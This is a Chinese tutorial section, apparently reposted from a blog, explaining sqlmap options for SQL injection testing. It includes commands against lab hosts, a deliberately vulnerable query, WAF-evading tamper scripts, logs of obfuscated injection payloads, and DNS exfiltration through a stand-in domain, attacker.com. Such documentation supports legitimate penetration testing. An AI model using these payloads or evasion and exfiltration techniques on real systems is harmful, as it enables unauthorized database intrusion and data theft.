六、优化

这些参数可以优化Sqlmap的性能。

1.一键优化

参数:-o

添加此参数相当于同时添加下列三个优化参数:

  • --keep-alive
  • --null-connection
  • --threads=3 (如果没有设置一个更好的值)

这些参数具体含义见后文。

2.HTTP长连接

参数:--keep-alive

该参数让Sqlmap使用HTTP长连接。该参数与“--proxy”矛盾。

3.HTTP空连接

参数:--null-connection

有一种特殊的HTTP请求类型可以直接获得HTTP响应的大小而不用获得HTTP响应体。显然这在布尔型盲注中可以节约很大的带宽。当然这一技术是需要服务器端支持的。该参数与“--text-only”矛盾。

4.HTTP并发

参数:--threads

使用该参数指定Sqlmap可以达到的最大并发数。从性能和网站承受能力两方面考虑最大并发数不要超过10。

七、注入

这些参数被用于指定要测试的参数、定制攻击荷载和选择篡改脚本。

1.要测试的注入点

参数:-p和--skip

默认情况下Sqlmap会测试所有GET参数和POST参数,当level大于等于2时会测试cookie参数,当level大于等于3时会测试User-Agent和Referer。实际上还可以手动指定一个以逗号分隔的、要测试的参数列表,该列表中的参数不受level限制。这就是“-p”的作用。

举个例子,若想只测试GET参数“id”和User-Agent,则可以这么写:

  -p "id,user-agent"

如果不想测试某一参数则可以使用“--skip”。如设置了level为5但不想测试User-Agent和Referer,则可以这么写:

  --level=5 --skip="user-agent,referer"

有时会遇到伪静态网页。动态网页会明目张胆地列出参数,如:

  /user.php?id=1

显然参数是id,值为1。但若是伪静态网页则可能这样写:

  /user/1/

将参数隐藏在URL中。通常情况下Sqlmap不会对这样的伪静态网页的参数做测试,因为Sqlmap无法判断哪个是参数。若想要对这样的伪静态进行测试,只需要加上“*”,告诉Sqlmap哪个是伪静态参数就行,剩下事的和GET参数没有什么区别。如:

  python sqlmap.py -u "http(s)://target.cc/user/1*/"

2.指定数据库管理系统

参数:--dbms

dbms是“Database Management System”的缩写。默认情况下Sqlmap会自动检测网站使用的数据库管理系统,Sqlmap支持以下这些数据库管理系统:

  • MySQL
  • Oracle
  • PostgreSQL
  • Microsoft SQL Server
  • Microsoft Access
  • Firebird
  • SQLite
  • Sybase
  • SAP MaxDB
  • DB2

如果Sqlmap自动检测失败或是不想让Sqlmap进行数据库指纹检测,可以使用参数“--dbms”手动指定数据库管理系统,如:“--dbms postgresql”。

对于Mysql和Microsoft SQL Server和要这样指定:

  --dbms MySQL <version>--dbms Microsoft SQL Server <version>

对于MySQL来说,是类似这样的:5.0。对于Microsoft SQL Server来说,是类似这样的:2005。

如果在添加“--dbms”参数的同时还添加了“--fingerprint”,Sqlmap只会在指定的数据库管理系统内进行指纹识别。

只有在很确定时使用“--dbms”,否则还是让Sqlmap自动检测更好些。

3.指定运行数据库管理系统的操作系统

参数:--os

默认情况下Sqlmap会自动检测运行数据库管理系统的操作系统,目前完全支持的操作系统有:

  • Linux
  • Windows

如果很确定可以使用参数“--os”指定运行数据库管理系统的操作系统。当然在只用很确定时才应该使用此参数,否则还是让Sqlmap自动检测更好些。

4.生成无效参数值时强制使用大数

参数:--invalid-bignum

有时在注入测试时需要生成无效参数,一般情况下Sqlmap会取已有参数(如:id=13)的相反数(如:id=-13)作为无效参数。但若添加“--invalid-bignum”,Sqlmap就会取大数(如:id=99999999)作为无效参数。

5.生成无效参数值时强制使用逻辑操作符

参数:--invalid-logical

有时在注入测试时需要生成无效参数,一般情况下Sqlmap会取已有参数(如:id=13)的相反数(如:id=-13)作为无效参数。但若添加“--invalid-logical”,Sqlmap就会使用逻辑操作符(如:id=13 AND 18=19)作为无效参数。

6.生成无效参数值时强制使用字符串

参数:--invalid-string

有时在注入测试时需要生成无效参数,一般情况下Sqlmap会取已有参数(如:id=13)的相反数(如:id=-13)作为无效参数。但若添加“--invalid-logical”,Sqlmap就会使用字符串(如:id=akewmc)作为无效参数。

7.关闭payload转换

参数:--no-cast

在检索结果时Sqlmap会将所有输入转换为字符串类型,若遇到空值(NULL)则将其替换为空白字符。 这样做是为了防止如连接空值和字符串之类的任何错误发生并可以简化数据检索过程。 但是有报告显示在老版本的Mysql中这样做会导致数据检索出现问题,因此添加了“--no-cast”来告诉Sqlmap不要这样做。

8.关闭字符串编码

参数:--no-escape

有时Sqlmap会使用用单引号括起来的字符串值作为payload,如“SELECT 'foobar'”,默认地这些值会被编码,如上例将被编码为: “SELECT CHAR(102)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(97)+CHAR(114))”。这样做既可以混淆视听让人一时难以洞察payload的内容又可以在后台服务器使用类似magic_quote或mysql_real_escape_string这样的转义函数的情况下字符串不受影响。当然在某些情况下需要关闭字符串编码,如为了缩减payload长度,用户可以使用“--no-escape”来关闭字符串编码。

9.定制payload

参数:--prefix和--suffix

有时只有在payload后添加用户指定的后缀才能注入成功。另一种场景是用户已经知道查询语句怎么写的,此时可以直接指定payload的前缀和后缀来完成检测和注入。

一个有漏洞的源码示例如下:

  query = "SELECT * FROM users WHERE id=('" . $\_GET['id'] . "') LIMIT 0, 1";

对这样的例子可以让Sqlmap自动检测边界范围也可以手动指出边界范围:

  python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix "AND ('abc'='abc"

最终SQL语句会变成:

  SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1

这个句子语法是正确的,payloa也能执行。

在简单的测试环境下Sqlmap不需要被提供定制的边界范围就能够自动检测并完成注入,但在真实世界中某些应用可能会很复杂如嵌套JOIN查询,此时就需要为Sqlmap指明边界范围。

10.修改注入数据

参数:--tamper

除了用CHAR()编码字符串外Sqlmap没有对payload进行任何混淆。 该参数用于对payload进行混淆以绕过IPS或WAF。 该参数后跟一个tamper脚本的名字。 若该tamper脚本位于sqlmap的安装目录的tamper/目录中,就可以省略路径和后缀名,只写文件名。 多个tamper脚本之间用空格隔开。

在tamper/目录中有许多可用的tamper脚本。tamper脚本的作用是对payload进行混淆。 我们还可以自己写tamper脚本,这属于Sqlmap的高级用法,一个有效的tamper脚本如下所示:

  # 必须要导入的库from lib.core.enums import PRIORITY# 定义该tamper脚本的优先级__priority__ = PRIORITY.NORMALdef tamper(payload):'''此处是tamper的说明'''retVal = payload# 此处是用于修改payload的代码# 返回修改后的payloadreturn retVal

下面是一个示例,该示例的目标是Mysql,假定大于号、空格和开头的SELECT是被禁止的:

  python sqlmap.py -u "http://192.168.56.101:8080/ScorePrj/?id=1" \--tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

该示例部分输出如下:

  [12:55:52] [DEBUG] cleaning up configuration parameters[12:55:52] [INFO] loading tamper script 'between'[12:55:52] [INFO] loading tamper script 'randomcase'[12:55:52] [INFO] loading tamper script 'space2comment'[...][12:55:53] [INFO] testing for SQL injection on GET parameter 'id'[12:55:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[12:55:53] [PAYLOAD] 1[12:55:53] [PAYLOAD] 1)/**/aNd/**/8083=4737/**/aNd/**/(4754/**/BetwEen/**/4754/**/aNd/**/4754[12:55:53] [PAYLOAD] 1)/**/anD/**/4962=4962/**/anD/**/(2361/**/BeTweEN/**/2361/**/anD/**/2361[12:55:53] [PAYLOAD] 1/**/aNd/**/9754/**/BETwEEn/**/1206/**/aNd/**/1206[12:55:53] [PAYLOAD] 1/**/AnD/**/4962/**/beTweEn/**/4962/**/AnD/**/4962[12:55:53] [PAYLOAD] 1/**/aND/**/2741/**/BetWeEn/**/9323/**/aND/**/9323--/**/Ihsa[12:55:53] [PAYLOAD] 1/**/anD/**/4962/**/BetweEN/**/4962/**/anD/**/4962--/**/wVUI[12:55:53] [PAYLOAD] 1')/**/anD/**/1694=6061/**/anD/**/('zLwu'='zLwu[12:55:53] [PAYLOAD] 1')/**/ANd/**/4962=4962/**/ANd/**/('Dsfw'='Dsfw[12:55:53] [PAYLOAD] 1'/**/aND/**/6307=8901/**/aND/**/'fKLn'='fKLn[12:55:53] [PAYLOAD] 1'/**/aNd/**/4962=4962/**/aNd/**/'YFsp'='YFsp[12:55:53] [PAYLOAD] 1%'/**/anD/**/3549=6854/**/anD/**/'%'='[12:55:53] [PAYLOAD] 1%'/**/aND/**/4962=4962/**/aND/**/'%'='[...][12:55:54] [PAYLOAD] 1)/**/uNIoN/**/alL/**/Select/**/nuLl--/**/NRtq[12:55:54] [PAYLOAD] 1)/**/UnIOn/**/alL/**/sElEcT/**/nuLL,nuLL--/**/jalk[12:55:54] [PAYLOAD] 1)/**/Union/**/aLl/**/seLeCt/**/nuLL,nuLL,nuLL--/**/ylpg[...]

而若不加tamper脚本,上例的部分输出为:

[...][13:00:12] [INFO] testing for SQL injection on GET parameter 'id'[13:00:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[13:00:12] [PAYLOAD] 1) AND 9902=5632 AND (5820=5820[13:00:12] [PAYLOAD] 1) AND 6711=6711 AND (7174=7174[13:00:12] [PAYLOAD] 1 AND 7140=6136[13:00:12] [PAYLOAD] 1 AND 6711=6711[13:00:12] [PAYLOAD] 1 AND 1693=7532-- oqcR[13:00:12] [PAYLOAD] 1 AND 6711=6711-- qAPJ[13:00:12] [PAYLOAD] 1') AND 6904=7395 AND ('xBlu'='xBlu[13:00:12] [PAYLOAD] 1') AND 6711=6711 AND ('RgoX'='RgoX[13:00:12] [PAYLOAD] 1' AND 6469=7302 AND 'maCj'='maCj[13:00:12] [PAYLOAD] 1' AND 6711=6711 AND 'pSYg'='pSYg[13:00:12] [PAYLOAD] 1%' AND 7516=3605 AND '%'='[13:00:12] [PAYLOAD] 1%' AND 6711=6711 AND '%'='[...][13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL-- mUDh[13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL-- QKId[13:00:12] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL-- iwvT[...]

八、检测

1.检测级别

参数:--level

此参数用于指定检测级别,有1~5共5级。默认为1,表示做最少的检测,相应的,5级表示做最多的检测。 Sqlmap使用的payload保存在目录xml/payloads/中,是xml格式的,可以自己定制。节选一个payload如下所示:

  <test><title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title><stype>1</stype><level>2</level><risk>1</risk><clause>1</clause><where>1</where><vector>AND [INFERENCE]</vector><request><payload>AND [RANDNUM]=[RANDNUM]</payload><comment>[GENERIC_SQL_COMMENT]</comment></request><response><comparison>AND [RANDNUM]=[RANDNUM1]</comparison></response></test>

在上例中可以看到有level标签,其值为2,该payload在检测级别大于等于2时被使用。 risk标签的含义见后文。

检测级别不仅会影响payload的使用,还会影响注入点的检测,GET和POST参数是一直会被检测的, 检测级别大于等于2时会检测cookie是否有注入,检测级别大于等于3时会检测User-Agent和Referer是否有注入。

若不是很清楚注入点在哪里可以设置一个比较高的检测级别。

强烈建议在向Sqlmap官方报告一个明确存在的注入漏洞检测不出来前先把检测级别调高试试。

2.风险等级

参数:--risk

此参数用于指定风险等级,有1~4共4级。默认风险等级为1,此等级在大多数情况下对测试目标无害。 风险等级2添加了基于时间的注入测试,等级3添加了OR测试。

若注入点是在UPDATE语句中,使用OR测试可能会修改整个表的数据,这显然不是攻击者想要看到的。 因此用户需要能控制风险等级避开有潜在风险的payload。

3.页面对比

参数:--string、--not-string、--regexp

默认情况下在布尔型注入中Sqlmap通过比较返回页面内容来判断True或False。 但有时页面每次刷新都会不同,如页面中有动态广告。Sqlmap会尽力判断出页面中动态的部分来,但并不总能成功。 用户可以用参数“--string”指出代表True的页面会包含而代表False的页面不会包含的字符串以供Sqlmap判断True或False, 若这样的字符串是变动的还可以用参数“--regexp”指定一个正则表达式去匹配这样的字符串。 或者用参数“--not-string”指出代表False的页面会包含而代表True的页面不会包含的字符串。

参数:--code

或者更简单地,若是用户知道代表True的页面HTTP状态码为200而代表False的页面HTTP状态码不为200比如是401, 可以用“--code”参数告诉告诉Sqlmap这一信息,如“--code=200”。

参数:--titles

若是用户知道代表True的页面title和代表False的页面title不同, 如代表True的页面title为“Welcome”,代表False的页面title为“Forbidden”, 就可以使用参数“--titles”让Sqlmap依据title来判断True或False。

参数:--text-only

若是HTTP响应体中有许多诸如JavaScript之类的活动内容,可以使用参数“--text-only”让Sqlmap只专注于纯文本内容。

九、注入技术

这些参数用于对特定的SQL注入技术进行调整。

1.检测时所用技术

参数:--technique

此参数用于指定检测注入时所用技术。默认情况下Sqlmap会使用自己支持的全部技术进行检测。 此参数后跟表示检测技术的大写字母,其值为B、E、U、S、T或Q,含义如下:

  • B:Boolean-based blind(布尔型注入)
  • E:Error-based(报错型注入)
  • U:Union query-based(可联合查询注入)
  • S:Stacked queries(可多语句查询注入)
  • T:Time-based blind(基于时间延迟注入)
  • Q:Inline queries(嵌套查询注入)

可以用“--technique ES”来指定使用两种检测技术。“--technique BEUSTQ”与默认情况等效。

想要访问文件系统或是Windows的注册表就一定要添加“S”进行多语句查询注入测试。

2.基于时间延迟注入中延时设置

参数:--time-sec

用此参数设置基于时间延迟注入中延时时长,默认为5秒。

3.联合查询注入中列数设置

参数:--union-cols

在进行联合查询注入时,Sqlmap会自动检测列数,范围是1到10。当level值较高时列数检测范围的上限会扩大到50。

可以用此参数指定列数检测范围,如“--union-cols 12-16”就会让Sqlmap的列数检测范围变成12到16。

4.联合查询注入中字符设置

参数:--union-char

默认情况下Sqlmap进行联合查询注入时使用空字符(NULL)。但当level值较高时Sqlmap会生成随机数用于联合查询注入。 因为有时使用空字符注入会失败而使用随机数会成功。

使用此参数可以指定联合查询注入中使用的字符,如:“--union-char 123”。

“联合查询注入中使用的字符”究竟是什么意思呢?请看下面两个例子:

第一个例子,不使用“--union-char”,默认情况下联合查询注入中使用的字符为空字符(NULL):

  python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3

部分输出为:

  [10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,CONCAT(0x71707a6271,0x66546c7770497458576f6455476761654654745744684c5062585971794c556d55454a6c49525675,0x7162767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FAcV[10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a6271,0x6b43674e76687959526b6452627255787373675a6f5a436f7266756d49424547496d506779456170,0x7162767671),NULL,NULL,NULL,NULL,NULL-- caXD

第一个例子,使用“--union-char 123”,指定联合查询注入中使用的字符为“123”:

  python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3 --union-char 123

部分输出为:

  [10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x776c71686e54726659424b49616d68756e64734d45774c4c7163494345794255784557597a484244,0x7178627071)-- aUXO[10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x6f5278444767675156496c724563714e6568634c6b5950646a6f4e53516b776d77474e7141425273,0x7178627071),123-- lPHb

仔细观察上示两例的输出就能明白“联合查询注入中使用的字符”就是“UNION ALL SELECT XXX, XXX”中的“XXX”。

5.联合查询注入中表名设置

参数:--union-from

有些情况下在联合查询中必须指定一个有效和可访问的表名,否则联合查询会执行失败,如在微软的Access中。 (也就是说,某些DBMS不支持“SELECT 1,2;”这样的语句,SELECT必须有FROM。) 用此参数指定这个表名,如:“--union-from=users”。

6.DNS泄露攻击

参数:--dns-domain

SQL注入中的DNS泄露攻击详情见论文《Data Retrieval over DNS in SQL Injection Attacks》。

假设攻击者控制着某域名(例如:attacker.com)的域名解析服务器,即查询该域名的子域名对应的IP地址都会到这台域名解析服务器来查询。 这时攻击者就可以使用“--dns-domain attacker.com”来进行DNS泄露攻击。

实际上若是攻击者没有控制任何一台域名解析服务器,那么她可以注册一个新域名,再自己搭建一台域名解析服务器用于接受数据。

7.二阶注入攻击

参数:--second-order

有时注入结果显示在别的页面,此时需要用此参数指明显示注入结果的页面,该参数后跟一个URL。

十、指纹

默认地Sqlmap会自动对注入目标进行数据库管理系统指纹识别。

参数:-f或--fingerprint

若想执行更广泛的数据库管理系统指纹识别可以添加此参数。

参数:-b或--banner

若想得到更精确的指纹识别结果可以添加此参数,详情见后文。

十一、暴力破解

1.暴力破解表名

参数:--common-tables

有些情况下用“--tables”不能列出数据库中表名来,如:

  • 版本小于5.0的MySQL没有information_schema表
  • 微软Access的MSysObjects表默认不可读
  • 数据库用户权限过低无法读取表名

当无法读出表名时可以使用参数“--common-tables”暴力破解表名, 该参数使用的字典是txt/common-tables.txt,其中存储了常见表名,可以手动编辑该文件。

2.暴力破解列名

参数:--common-columns

有些情况下用“--columns”不能列出数据表中列名来,如:

  • 版本小于5.0的MySQL没有information_schema表
  • 微软Access的MSysObjects表默认不可读
  • 数据库用户权限过低无法读取列名

当无法读出列名时可以使用参数“--common-columns”暴力破解列名, 该参数使用的字典是txt/common-columns.txt,其中存储了常见列名,可以手动编辑该文件

转载于:https://www.cnblogs.com/botoo/p/8446140.html

安全测试===sqlmap(壹)转载相关推荐

  1. 安全测试===sqlmap(零)转载

    本文转自:https://blog.werner.wiki/sqlmap-study-notes-0/ 感谢作者的整理,如有侵权,立删 零.前言 这篇文章是我学习Sqlmap的用法时做的笔记,记录了S ...

  2. 如何成为一个好的测试工程师(转载,大意)

    对于测试功能是的两个不同观点:软实力和技术能力. 个人觉得技术能力80%可以被大众掌握,但是软实力是需要花费很多时间去培养和塑造的.一下几点也是能够衡量个人技能的一些标准: 1,沟通技能-口头和书面能 ...

  3. 10大主流压力测试工具推荐(转载)

    在移动应用和Web服务正式发布之前,除了进行必要的功能测试和安全测试,为了保证互联网产品的服务交付质量,往往还需要做压力/负载/性能测试.然而很多传统企业在试水互联网+的过程中,往往由于资源或产品迭代 ...

  4. 优秀的测试网站(转载)

    原文出处:http://www.weste.net/2006/6-6/12070371411.html 63个国外优秀测试站点链接 http://bdonline.sqe.com/ 一个关于网站测试方 ...

  5. 安全测试===sqlmap

    本文转自:https://www.secpulse.com/archives/4213.html 鉴于很多新手对sqlmap的用法不是很熟悉 很多常用sqlmap的也不一定完全会用sqlmap 特此补 ...

  6. 阳光的测试工作历程(转载)

    入门 在五年前我也是一个新手,是个很菜很菜的新手,那个时候我大学还没有毕业(专科,没有名气的专科),因为一个机会我进入了测试行业,我什么都不懂,我不会最简单的网络测试明令ping,不知道什么是搜索引擎 ...

  7. 渗透测试-sqlmap绕过WAF脚本编写

    sqlmap绕过WAF脚本编写 文章目录 sqlmap绕过WAF脚本编写 前言 一.什么是sqlmap和tamper脚本 二.利用sqlmap脚本进行扫描获取数据库信息 1.编写sqlmap绕过WAF ...

  8. [5] 使用 TestLink 进行测试管理 『转载』

    TestLink用于进行测试过程中的管理,通过使用TestLink提供的功能,可以将测试过程从测试需求.测试设计.到测试执行完整的管理起来,同时,它还提供了好多种测试结果的统计和分析,使我们能够简单的 ...

  9. 新加入一个团体,如何能尽快的展开测试工作(转载)

    作为一名测试新人加入团队,大多数情况下,项目组成员都是一种热情欢迎的态度,并且主动提供力所能及的支持和帮助,如何快速熟悉项目业务和测试环境,尽快投入到实际工作中去,我谈谈个人的经验和一些看法,供同行参 ...

最新文章

  1. Nginx+MSM+Tomcat做负载均衡,session共享
  2. 如何快速查看mysql数据文件存放路径?
  3. c#中消息机制阻塞实例与结论
  4. log双线性模型log-bilinear model简单概括
  5. CTS(14)---Android O CTS 测试之Media相关测试小结(二)
  6. 教材订购模块java代码实现_java教材征订系统
  7. 微信小程序调用百度云H5人脸识别
  8. 目前使用SAP的公司列表
  9. ol xyz 加载天地图_OpenLayers 3 之 加载天地图
  10. python当行刷新
  11. w7计算机文件夹打开怎么设置密码,w7文件夹怎么设密码_w7文件夹设置密码操作方法...
  12. 图像增强技术基础、评价指标及其经典算法
  13. Excel如何快速隔行插入空行
  14. ndk 的emac_德州仪器的EMAC外设开发包,配合NDK使用,应在CCS4.2版本以上使用
  15. 君士坦丁堡升级要点详解
  16. QT延时函数sleep
  17. linux shell变量的,linux shell变量解析
  18. 看图学习VMWare以及常见问题答疑(转)
  19. 7月清北学堂培训 Day 1
  20. 佛祖保佑,永无bug——springboot项目启动图案的修改方法

热门文章

  1. IOS 控制器View的创建方式(方式的优先级 、view的延迟加载)
  2. Spring的javaMail邮件发送(带附件)
  3. 驱动编程class_create说明
  4. iBatis的基本配置+CRUD操作
  5. windows froms 程序打包 (转载)
  6. Java定时器的cron设置详解Quartz
  7. Linux下导入SQL文件
  8. Struts--result详解
  9. 05-02 docker 安装与配置-CentOS
  10. 计算机体系结构_计算机体系结构知识笔记